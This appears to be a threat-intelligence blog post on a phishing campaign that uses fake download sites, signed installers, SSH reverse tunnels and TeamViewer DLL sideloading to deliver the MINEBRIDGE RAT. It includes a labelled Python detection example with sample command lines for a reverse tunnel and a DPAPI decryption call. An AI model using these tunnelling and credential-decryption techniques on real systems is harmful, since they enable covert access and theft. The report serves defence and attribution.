Source: https://ti.qianxin.com/blog/articles/Operation-HideBear-Russian-Threat-Actors-Targeting-East-Asia-and-North-America-EN/

Operation HideBear: Russian Threat Actors Targeting East Asia and North America

2023-10-16 By RedDrip Team (红雨滴团队) | Event Tracking


OVERVIEW

QiAnXin Threat Intelligence Center observed a previously unknown threat actor group
towards the end of 2022. The group impersonated the download pages of common
software and purchased Google search placement so that these fake websites ranked
above the official ones. Their aim was to induce victims into downloading
installation packages that carried unofficial but valid code signatures and had
been repackaged with Inno Setup.



Because of the complexity of the attack chain and the attackers' reliance on
manual operations, the final payload remained elusive. This made attribution
difficult until mid-2023, when we observed a DLL sideloading component that
abuses TeamViewer being delivered via SFTP to compromised endpoints in East
Asia and North America. This activity led us to conclude that the group is
related to the attacks against security researchers disclosed by Zscaler
ThreatLabz in 2021 [1].

The phishing activity timeline for this group in the past year is as follows:





ATTACK CHAIN

The attack chain for Operation HideBear's recent phishing activity is as
follows:



The focus of the entire execution chain is on SSH reverse tunnels. Because
OpenSSH is a legitimately signed and commonly allow-listed binary, its use is
relatively easy for EDR endpoint detections to overlook. In the end, the
attackers used sftp-server.exe to deliver the TeamViewer hijacking component to
the victim's machine. After analyzing the sample, which was obfuscated with
Themida, we identified it as the MINEBRIDGE RAT. We also found the use of
AnyDesk and an attempt at lateral movement using PsExec. To decrypt keys, the
attackers called [System.Security.Cryptography.ProtectedData]::Unprotect, a
DPAPI wrapper, which means the data can only be decrypted within the victim
machine's user context.
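As an added defensive illustration (example code written here, not code from the QiAnXin report), the following Python scans constructed endpoint events for the three markers of this chain the report names: an OpenSSH client started with a reverse (-R) tunnel, sftp-server.exe writing a DLL into a TeamViewer directory, and a PowerShell command line invoking ProtectedData::Unprotect. The event field names, file paths and the DLL file name are assumptions.

```python
import re
from typing import Callable, Dict, List

# Constructed sample endpoint events (not real telemetry); field names, paths
# and the DLL name are assumptions made for this example.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "ssh.exe -N -R 2222:127.0.0.1:22 relay@192.0.2.10"},
    {"type": "file", "image": r"C:\Windows\System32\OpenSSH\sftp-server.exe",
     "target": r"C:\Users\alice\AppData\Local\TeamViewer\example_sideload.dll"},
    {"type": "process", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -c \"[System.Security.Cryptography.ProtectedData]"
                "::Unprotect($blob, $null, 'CurrentUser')\""},
    {"type": "process", "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "ssh.exe -L 8080:intranet:80 dev@jump.example"},  # local forward, not flagged
]


def rule_reverse_tunnel(e: Dict[str, str]) -> bool:
    # OpenSSH client asked for a remote (reverse) port forward via -R or RemoteForward.
    return (e["type"] == "process" and e["image"].lower().endswith("\\ssh.exe")
            and re.search(r"(^|\s)-R\s|\bRemoteForward\b", e["cmdline"]) is not None)


def rule_sftp_drops_dll(e: Dict[str, str]) -> bool:
    # sftp-server.exe writing a DLL beside a signed remote-access tool: sideloading staging.
    return (e["type"] == "file" and e["image"].lower().endswith("\\sftp-server.exe")
            and e["target"].lower().endswith(".dll") and "\\teamviewer\\" in e["target"].lower())


def rule_dpapi_unprotect(e: Dict[str, str]) -> bool:
    # Script-driven DPAPI decryption in the logged-on user's context.
    return e["type"] == "process" and "protecteddata]::unprotect" in e["cmdline"].lower()


RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "ssh_reverse_tunnel": rule_reverse_tunnel,
    "sftp_dll_drop": rule_sftp_drops_dll,
    "dpapi_unprotect": rule_dpapi_unprotect,
}


def scan(events: List[Dict[str, str]]) -> List[tuple]:
    """Return (rule_name, event_index) pairs for every rule that fires, in event order."""
    return [(name, i) for i, e in enumerate(events) for name, rule in RULES.items() if rule(e)]


if __name__ == "__main__":
    for name, i in scan(SAMPLE_EVENTS):
        print(f"[{name}] event {i}: {SAMPLE_EVENTS[i]['image']}")
```

The local-forward (-L) event is deliberately included so the reverse-tunnel rule can be checked against a benign ssh.exe invocation.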



In this phishing campaign, four legitimate code-signing certificates were used.
Some of these signatures were still valid when this report was completed.
Further analysis found that the group had also employed the Amadey commercial
Trojan, although its purpose remains unknown.

Thumbprint                                  Signer
FC2BDF5BD23470669F63B9A5BAE6305160DCBC67    GUTON LLC
A05536924F1BA8F99BA6B1AA3C97B809E32A477E    NTB CONSULTING SERVICES INC.
A1C753F5271F24B8067AC864BB4192C37265840C    OOO RIMMA
9A865A28A85CABC3F79C88BE54AF3B20962BC35C    KATEN LLC

We have also discovered the latest variant of the MINEBRIDGE RAT. The sample
appears to have been obfuscated with LLVM-based obfuscation, and some older C&C
commands have been removed. Upon execution, it retrieves a DLL from the C&C
server and loads it into memory. The primary function of this DLL is to create a
pipeline for executing PowerShell commands delivered by the C&C server; the
PowerShell scripts executed this way are consistent with the scripts used to
download the SSH component mentioned above.



ATTRIBUTION AND IMPACT

The registration times of the front domains accessed in the Inno Setup
installation packages suggest that the group has been active since 2021.
However, during this time, there were very few reports in the OSINT community
about MINEBRIDGE. In this vacuum, the attackers' activities seemed to be
challenging to trace. We discovered several built-in domains in MINEBRIDGE,
including one with a CN ending. Some of these domains have expired. Historical
resolution records indicate that they once used Cloudflare CDN nodes to conceal
their real IP between 2021 and 2022.

Start of CDN Node Resolution    End of CDN Node Resolution
2021-10-01                      2022-09-01
2021-09-04                      2022-09-03
2021-10-01                      2022-04-24

Based on historical data from QiAnXin's big-data platform, we found that during
the period when the malicious domains resolved to Cloudflare CDN nodes, there was
communication with those domains from corporate dedicated lines and home
broadband connections in mainland China. The enterprises involved were in
sectors such as cryptocurrency, electronic components, technology, investment,
and healthcare.



Operation HideBear's infrastructure distribution is as follows:



This implies that MINEBRIDGE's activities are not solely economically motivated,
but there is also an objective of stealing electronic information technology and
medical technology. Mandiant first disclosed [2] MINEBRIDGE in 2020, mentioning
that it might be a subset of TA505 or an entirely new group. Subsequent reports
from other vendors have attributed it to TA505. From the information we
currently have, it seems more likely that MINEBRIDGE is operated by a new threat
group. This threat group has been disclosed by Microsoft Threat Intelligence
Center as Storm-0978 (RomCom) [3]. The phishing techniques used in Operation
HideBear are similar to those used by Storm-0978. Both activities involve the
forgery of the Advanced IP Scanner installer package. More importantly, we found
that the Operation HideBear campaign and Storm-0978 (RomCom) used an identical
framework to create the fake websites. Hence, we have medium to high confidence
that Storm-0978 (RomCom), TA505, and MINEBRIDGE have deep connections.



SUMMARY

Currently, all products of QiAnXin Threat Intelligence Center, including QiAnXin
Threat Intelligence Platform (TIP), Tianqing, Tianyan Advanced Threat Detection
System, QiAnXin NGSOC, and QiAnXin Situational Awareness, support accurate
detection of such attacks.





IOC

For detailed indicators of compromise (IOCs) related to this organization,
please contact QiAnXin Threat Intelligence Center at ti.qianxin.com.



REFERENCE LINKS

[1] https://www.zscaler.com/blogs/security-research/return-minebridge-rat-new-ttps-and-social-engineering-lures

[2] https://www.mandiant.com/resources/blog/stomp-2-dis-brilliance-in-the-visual-basics

[3] https://www.microsoft.com/en-us/security/blog/2023/07/11/storm-0978-attacks-reveal-financial-and-espionage-motives/
